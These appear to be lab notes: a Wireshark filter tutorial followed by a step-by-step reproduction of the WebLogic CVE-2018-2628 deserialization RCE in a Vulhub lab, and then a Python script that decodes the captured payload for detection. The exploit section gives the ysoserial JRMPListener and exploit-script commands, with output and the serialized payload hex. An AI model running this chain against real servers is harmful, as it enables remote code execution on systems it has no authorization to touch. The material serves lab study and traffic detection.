Wireshark
1. Download
- https://www.wireshark.org/download.html
- https://1.na.dl.wireshark.org/win64/Wireshark-win64-3.2.6.exe
2. Basic operations
2.1 Select the interface to capture on
2.2 Panes
- Pane 1: display filter bar.
- Pane 2: packet list. Packets of different protocols are coloured differently, which makes them easy to tell apart.
- Pane 3: packet details.
  - frame: physical-layer summary of the frame
  - ethernet: data-link-layer Ethernet frame header
  - internet protocol version 4: internet-layer IP header
  - transmission control protocol: transport-layer segment header (TCP in this case)
  - hypertext transfer protocol: application-layer data (HTTP in this case)
- Pane 4: hex dump. Click a field in the packet details pane and the corresponding bytes are highlighted in the hex pane.
2.3 Protocol filters
- tcp, icmp, http, udp, ...
- Entering just a protocol name shows only packets of that protocol, e.g. entering http.
2.4 IP filters
- ip.src == 120.241.148.154: show packets whose source address is 120.241.148.154
- ip.dst == 120.241.148.154: show packets whose destination address is 120.241.148.154
- ip.addr == 120.241.148.154: show packets whose source or destination address is 120.241.148.154
2.5 Port filters
- tcp.port == 80: show packets whose source or destination port is 80.
- tcp.srcport == 80: show only TCP packets whose source port is 80.
- tcp.dstport == 80: show only TCP packets whose destination port is 80.
2.6 HTTP filters
- http.request.method == "GET": show only HTTP GET requests
- http.request.method == "POST"
2.7 Logical operators and/or/not
- http.request.method == "POST" and ip.src == 192.168.71.249: show only POST requests sent by 192.168.71.249.
2.8 Filtering on a selected field value
- Packet details > select the field > right-click: Apply as Filter > Selected
- Select the cookie (for example one carrying a malicious payload), right-click, Apply as Filter > Selected: only packets whose cookie equals the selected value are shown.
3. WebLogic WLS Core Components deserialization remote command execution vulnerability (CVE-2018-2628)
3.1 Stand up the vulnerable lab with Vulhub in one step
https://vulhub.org/#/environments/weblogic/CVE-2018-2628/
https://docs.docker.com/engine/install/centos/
```
# yum install -y yum-utils device-mapper-persistent-data lvm2
# yum-config-manager --add-repo http://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo
# yum install docker-ce
# systemctl enable docker
# systemctl start docker
# yum list docker-ce --showduplicates
```
https://docs.docker.com/compose/
```
# curl -L "https://github.com/docker/compose/releases/download/1.27.0/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
# chmod +x /usr/local/bin/docker-compose
# docker-compose --version
docker-compose version 1.27.0, build 980ec85b
```
```
# mkdir github
# cd github/
# yum install -y git
# git version
git version 1.8.3.1
```
https://vulhub.org/
```
# git clone https://github.com/vulhub/vulhub.git
正克隆到 'vulhub'...
remote: Enumerating objects: 78, done.
remote: Counting objects: 100% (78/78), done.
remote: Compressing objects: 100% (53/53), done.
remote: Total 9648 (delta 28), reused 55 (delta 15), pack-reused 9570
接收对象中: 100% (9648/9648), 129.47 MiB | 35.00 KiB/s, done.
处理 delta 中: 100% (3791/3791), done.
# pwd
/github/vulhub
# pwd
/github/vulhub/weblogic/CVE-2018-2628
```
```
# docker-compose build
weblogic uses an image, skipping
# docker-compose up -d
Creating network "cve-2018-2628_default" with the default driver
Pulling weblogic (vulhub/weblogic:)...
latest: Pulling from vulhub/weblogic
```
```
Digest: sha256:275ec19477cfda389dc1c42158033e7e8c650dd4cba9f090ca0ba673902b73c9
Status: Downloaded newer image for vulhub/weblogic:latest
Creating cve-2018-2628_weblogic_1 ... done
# docker images
REPOSITORY        TAG     IMAGE ID      CREATED      SIZE
vulhub/weblogic   latest  7d35c6cd3bcd  3 years ago  2.46GB
# docker ps -a
CONTAINER ID  IMAGE            COMMAND             CREATED        STATUS        PORTS                              NAMES
bb165ea737df  vulhub/weblogic  "startWebLogic.sh"  9 minutes ago  Up 9 minutes  5556/tcp, 0.0.0.0:7001->7001/tcp  cve-2018-2628_weblogic_1
```
Browse to http://192.168.11.226:7001/console
```
# cd /github
# git clone https://github.com/frohoff/ysoserial.git
# cd ysoserial
# mvn package
```
3.2 Start a JRMP server with ysoserial
The -cp argument is the classpath, [command] is the command I want to execute, and [listen port] is the port the JRMP server listens on.
```
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
```
```
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'touch /tmp/success'
* Opening JRMP listener on 1099
Have connection from /192.168.11.226:55006
Reading message...
Is DGC call for [[0:0:0, 1688614442]]
Sending return with payload for obj [0:0:0, 2]
Closing connection
Have connection from /192.168.11.226:55008
```
3.3 Run the exploit and send the packet
https://www.exploit-db.com/exploits/44553
```
python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]
```
- [victim ip] and [victim port] are the IP and port of the target WebLogic server
- [path to ysoserial] is the local path to the ysoserial jar
- [JRMPListener ip] and [JRMPListener port] are the IP address and port of the JRMP server started in the previous step
- [JRMPClient] is the JRMPClient class to run; the possible values are JRMPClient and JRMPClient2
```
python CVE-2018-2628-exploit.py 192.168.11.226 7001 ysoserial-0.0.6-SNAPSHOT-all.jar 192.168.11.151 1099 JRMPClient
握手成功
send request payload successful,recv length:1690
command: java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient 192.168.11.151:1099 > payload.out
payload: b'aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3139322e3136382e31312e3135310000044b0000000064a6362a00000000000000000000000000000078'
response: exploit completed!
docker ps -a
CONTAINER ID  IMAGE            COMMAND             CREATED     STATUS        PORTS                              NAMES
bb165ea737df  vulhub/weblogic  "startWebLogic.sh"  5 days ago  Up 4 minutes  5556/tcp, 0.0.0.0:7001->7001/tcp  cve-2018-2628_weblogic_1
docker exec -it bb165ea737df /bin/bash
```
Inspect the traffic between the attacker IP and the victim IP:
ip.src == 192.168.11.150 and ip.dst == 192.168.11.226
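When triaging that conversation in Wireshark, the part worth decoding is the T3 request body the exploit printed above, which is also what the hex pane shows for the TCP stream to port 7001. The following Python script is an added example, not part of these notes or of Vulhub/ysoserial: it checks for the Java serialization magic, lists the class names embedded in the stream, and pulls the UnicastRef host and port, i.e. the JRMP listener the server would connect back to if it deserialized the object. The string walk is a length-prefix heuristic rather than a full Java serialization parser; the sample input is the payload bytes from the output above with the line-wrap spaces removed.

```python
import struct

# Java serialization stream header: STREAM_MAGIC 0xACED followed by STREAM_VERSION 5.
JAVA_SER_MAGIC = b"\xac\xed\x00\x05"

# Request payload printed by the exploit run above (wrap spaces removed), as seen in the 7001 TCP stream.
T3_PAYLOAD_HEX = (
    "aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001"
    "687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f63"
    "6174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e696361737452"
    "6566000e3139322e3136382e31312e3135310000044b0000000064a6362a00000000000000000000000000000078"
)

# Classes the JRMPClient gadget is built from; together with a UnicastRef they mark a callback payload.
JRMP_GADGET_CLASSES = {"java.lang.reflect.Proxy", "java.rmi.server.RemoteObjectInvocationHandler"}

def java_utf_strings(buf, min_len=3):
    """Heuristic walk: every length-prefixed run of printable ASCII (writeUTF layout), which is
    how class names, the ref type and the callback host appear in the stream."""
    out, i = [], 0
    while i + 2 <= len(buf):
        (n,) = struct.unpack_from(">H", buf, i)
        chunk = buf[i + 2:i + 2 + n]
        if min_len <= n == len(chunk) and all(0x20 <= b < 0x7f for b in chunk):
            out.append(chunk.decode("ascii"))
            i += 2 + n
        else:
            i += 1
    return out

def rmi_callback_endpoint(buf):
    """Host and port a deserialized UnicastRef would connect back to (the attacker's JRMP listener)."""
    i = buf.find(b"\x00\x0aUnicastRef")
    if i < 0:
        return None
    (n,) = struct.unpack_from(">H", buf, i + 12)          # writeUTF(host): 2-byte length
    host = buf[i + 14:i + 14 + n].decode("ascii", "replace")
    (port,) = struct.unpack_from(">I", buf, i + 14 + n)   # writeInt(port)
    return host, port

def triage_t3_payload(hex_payload):
    """Summarise what a captured T3 request body would do if the server deserialized it."""
    buf = bytes.fromhex(hex_payload)
    report = {"java_serialized": buf.startswith(JAVA_SER_MAGIC), "classes": [], "jrmp_callback": None}
    if report["java_serialized"]:
        report["classes"] = [s for s in java_utf_strings(buf) if s[0].isalpha() and "." in s]
        report["jrmp_callback"] = rmi_callback_endpoint(buf)
    report["suspicious"] = (bool(JRMP_GADGET_CLASSES & set(report["classes"]))
                            and report["jrmp_callback"] is not None)
    return report
```

For the payload above the report names 192.168.11.151:1099 as the callback endpoint, which is exactly the JRMP listener from step 3.2; an alert on a WebLogic server opening an outbound connection to an unexpected host on a port like that is the network-side detection for this class of attack.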